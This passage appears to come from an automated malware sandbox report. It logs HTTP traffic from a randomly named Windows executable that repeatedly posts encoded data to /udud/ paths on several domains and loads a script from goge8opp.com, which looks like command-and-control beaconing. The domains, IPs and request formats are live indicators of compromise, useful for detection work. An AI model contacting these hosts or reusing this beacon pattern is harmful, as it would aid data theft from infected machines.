                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.noispisok.com
                                                                                                Referer: http://www.noispisok.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6c 39 58 72 58 45 59 51 6d 74 43 2b 56 35 74 30 61 34 36 36 5a 46 51 65 47 31 79 4d 69 55 65 64 5a 34 31 57 34 78 30 6e 39 66 4e 68 54 34 61 69 4c 35 36 30 7a 48 31 73 43 6b 5a 54 4f 76 62 64 6a 38 32 71 50 41 67 55 6e 75 36 30 77 37 6f 7a 47 6e 68 2b 59 48 75 31 36 68 33 7a 77 41 79 70 41 38 6e 63 52 74 55 6b 4c 37 64 6c 63 78 6f 6e 39 6b 32 65 66 78 6d 7a 6c 41 47 71 42 64 4f 66 4a 57 76 47 61 6f 45 41 4d 6f 70 72 36 69 65 6c 35 6b 66 6c 68 76 51 4c 44 32 32 47 75 6f 6a 70 78 46 53 50 53 44 55 48 63 64 6c 72 4b 4a 76 30 36 54 6d 2f 39 58 4b 37 72 38 35 2b 2b 43 61 48 35 55 6a 39 47 36 32 4f 70 79 6b 67 2b 73 2f 41 44 37 78 75 78 46 6f 44 78 44 4b 41 33 43 46 50 4d 68 39 67 31 44 41 35 52 6e 77 2f 63 6f 71 4a 6d 6c 63 69 75 34 61 58 49 6c 45 36 6a 49 57 69 44 35 45 31 4c 6d 30 6c 72 70 43 36 45 6f 63 59 54 56 61 70 2b 4d 71 52 6e 45 6e 6b 53 4b 65 31 66 71 4d 58 77 47 56 4d 66 32 46 49 35 59 69 6b 42 39 39 43 57 51 37 39 36 4a 62 42 77 39 71 68 37 62 65 73 65 73 44 44 63 [TRUNCATED]
Data Ascii: Pl9P8ldX= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.30 | 49870 | 84.32.84.32 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:04.848985910 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:34:04.957856894 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                Server: hcdn
                                                                                                Date: Mon, 27 May 2024 10:34:04 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 10072
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                x-hcdn-request-id: 13b1463464eb0d7580b2fb3b46e148be-bos-edge1
                                                                                                Expires: Mon, 27 May 2024 10:34:03 GMT
                                                                                                Cache-Control: no-cache
                                                                                                Accept-Ranges: bytes
                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
May 27, 2024 12:34:04.957995892 CEST | 1289 | IN |
                                                                                                Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
May 27, 2024 12:34:04.958010912 CEST | 1289 | IN |
                                                                                                Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
May 27, 2024 12:34:04.958029985 CEST | 1289 | IN |
                                                                                                Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
May 27, 2024 12:34:04.958060980 CEST | 1289 | IN |
                                                                                                Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
May 27, 2024 12:34:04.958101988 CEST | 1289 | IN |
                                                                                                Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
May 27, 2024 12:34:04.958172083 CEST | 1289 | IN |
                                                                                                Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
May 27, 2024 12:34:04.958184958 CEST | 1289 | IN |
                                                                                                Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
May 27, 2024 12:34:04.958194971 CEST | 100 | IN
                                                                                                Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.30 | 49871 | 162.209.189.152 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:10.888120890 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.30 | 49872 | 162.209.189.152 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:13.571012974 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.30 | 49873 | 162.209.189.152 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:16.260219097 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.30 | 49874 | 162.209.189.152 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:18.944675922 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.30 | 49875 | 147.92.36.247 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:24.884090900 CEST | 733 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.uhahiq.com
                                                                                                Referer: http://www.uhahiq.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Ec+VxF76cmRRu8lCsmZ7cnKpkBicGufEdQSX/yhvdrlMnZMTfF+xigUrntpzKkTsnSHsK96b9/j/3/QZsaB+Ooqt630sHXpbwJqCBXInTG2VTaWEW6+MpvxpiSqytAMQooeGziL/B/63oV2g5R+MFY3U7QXUrabq14yBqTCitMR39s0m+p6c8EKuY9e5hmvb3w==
May 27, 2024 12:34:25.217092037 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:25 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=cc816e0b-e34f-4ee6-bdfc-3c71c1fb4a31; Path=/; HttpOnly; SameSite=Lax
                                                                                                Content-Encoding: gzip
May 27, 2024 12:34:25.217117071 CEST | 102 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.30 | 49876 | 147.92.36.247 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:27.725975990 CEST | 753 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.uhahiq.com
                                                                                                Referer: http://www.uhahiq.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Ec+VxF76cmRRsdVCvFx7XnKo4RicNOfAdQeX/zl/d9NMn7UTeACxjgUr/9p2SESunT7OK8Gb9/3/37UZssJ9foqv2X0uI3pbwJqCBThyTGeVTKmEXb+NjPxqyiqypANZooeozmLBB9y3oXug3g+PMY3OlgWjiKqGqYKJpEed0eAP1bF8jqOevk2DE8zRjkuAq60SdhuZeY1xx7SiSgMI/kU=
May 27, 2024 12:34:28.055875063 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:27 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=d193f5cd-b6e8-4b38-931e-39689d1602da; Path=/; HttpOnly; SameSite=Lax
                                                                                                Content-Encoding: gzip
May 27, 2024 12:34:28.055886030 CEST | 102 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.30 | 49877 | 147.92.36.247 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:30.575141907 CEST | 1670 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.uhahiq.com
                                                                                                Referer: http://www.uhahiq.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:34:30.907864094 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:30 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=7bd75baa-d7d4-4461-8ec9-608a5188c13f; Path=/; HttpOnly; SameSite=Lax
                                                                                                Content-Encoding: gzip
May 27, 2024 12:34:30.907887936 CEST | 102 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.30 | 49878 | 147.92.36.247 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:33.421188116 CEST | 475 | OUT | GET /udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:34:33.762996912 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:33 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 2007
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=58e2d53e-a227-484c-9753-173d8a6c657b; Path=/; HttpOnly; SameSite=Lax
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>404-</title><meta name="robots" content="nofollow"><meta http-equiv="pragma" content="no-cache"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="keywords" content="keyword1,keyword2,keyword3"><meta http-equiv="description" content="This is my page"><style>*{margin:0;padding:0;}body{font-family: 'Audiowide', cursive, arial, helvetica, sans-serif;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAUElEQVQYV2NkYGAwBuKzQAwDID4IoIgxIikAMZE1oRiArBDdZBSNMIXoJiFbDZYDKcSmCOYimDuNSVKIzRNYrUYOFuQgweoZbIoxgoeoAAcAEckW11HVTfcAAAAASUVORK5CYII=) repeat;background-color:#212121;color:white;font-size: 18px;padding-bottom:20px;}.error-code{font-family: 'Creepster', cursive, arial, hel [TRUNCATED]
                                                                                                May 27, 2024 12:34:33.763082027 CEST | 981 | IN
                                                                                                Data Ascii: erif;font-size: 200px;color: white;color: rgba(255, 255, 255, 0.98);width: 50%;text-align: right;margin-top: 5%;text-shadow: 5px 5px hsl(0, 0%, 25%);float: left;}.not-found{width: 47%;float: right;


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                49 | 192.168.11.30 | 49879 | 208.112.85.150 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:34:50.099581003 CEST | 481 | OUT | GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:34:50.206923962 CEST | 383 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:34:30 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                50 | 192.168.11.30 | 49880 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:34:55.443005085 CEST | 742 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==
                                                                                                May 27, 2024 12:34:55.657190084 CEST | 363 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:34:55 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                51 | 192.168.11.30 | 49881 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:34:58.190056086 CEST | 762 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtOUGP6c3QKMi6b0OrYgQK4TsrcVKjFPFfVwrFwdnWSVlnlh7gn3aLCH7Rd1pDIl/xuX+KUWEQKx7I2K6u2HJ803GmrKaze9oK7uzkMa156NiQtS7KjPkmqzNqCF8B9ySpc/d0/1W9kAoIyaaIjmDzGplMeWjGDAYIeUFSSOmV95Jf4=
                                                                                                May 27, 2024 12:34:58.402158022 CEST | 363 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:34:58 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                52 | 192.168.11.30 | 49882 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:00.919255972 CEST | 1679 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtGUauaclGCMsab0HLYlQK4Ssq4RKjJxFctwtn4dhlKVunlhkQn6F7Co7Vx5pDYl/xuX+MYWHBKxoY2Fte2TfM1SGmzaazbIoabuyEcam7SNtQtU4KjpkmmsNqeJ8A5ISvs/OF6eHssH05O3W8nYSCyht8eGkV/XQ7i6LnK71XBMLr9hZUcVPQqAqn72QsgWK+RsvLXLav6nfMfCf5+sZc/ROT6VCCxGeaaQPXXgHAuCAUKsf6eQBEfES0ukhpkKXDLaxerysCUtM+WCQRgt6h7hzcS32gJrDwHD2j5or4ms06gjMs1UgIooI9mIgZiJJKXJRriX6/DXqLg2MurzgH7jqldXIybfs5vzanwPTf7gIpjHnvy0WcGQoQ+4o+zER1DQDBOpEHui7ZY7mhVY8UcFavs7CJll27jiI1qVOhbvnn9ZpaHmiv7sh97tOQPDvA3BS/vJ9qhZHM+tmYw0/i0DvDkEPpwDx0/vMzA17AUstzehgqtMl03mmGPbhqHCHVidhoAqsNGCFo/0aQECnWLnQS3Q5zOQhJhzPn3NteRiuS2LGTa0DjSj3iDlTw/Zx9fSOycX4WnooNvgSEpZLEl49KNldbP4GKGmiFI64q1Q+dHwKtf3/WnRRvJaYSao8kmIqv+C/l0ju322eNUPauoBj/DEcFlh1FkA81pBJzz3T71CXZ8zqHB/Y4Yl0uAKrBKd22vmZiaapqx/jRem/xULkONx5IgHIS3TkyLu0ExnUNH+6n9dh9SzB3I/SYbK5/rm/9Uc86++uhgYJ2pCwimdb1gK7CUNIkDNjooUlr1a2uceMznEJ42tzkCzrk4OwF/G8FZVf/O/2io0WctzD/hDzXoe8nOZoe59yateOEcKDCICCPs4KxzdbhS9684L4GzjEJP8ulzAgd3LubN+o0IRjeQiBjPLnB97H8GrkkXgV9cotNTUYodrdNmIFLngn27 [TRUNCATED]
                                                                                                May 27, 2024 12:35:01.127223969 CEST | 363 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:35:01 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                53 | 192.168.11.30 | 49883 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:03.657161951 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:03.869951010 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 27 May 2024 10:35:03 GMT
                                                                                                Server: Apache
                                                                                                Cache-control: max-age=300
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Length: 5662
                                                                                                Connection: close
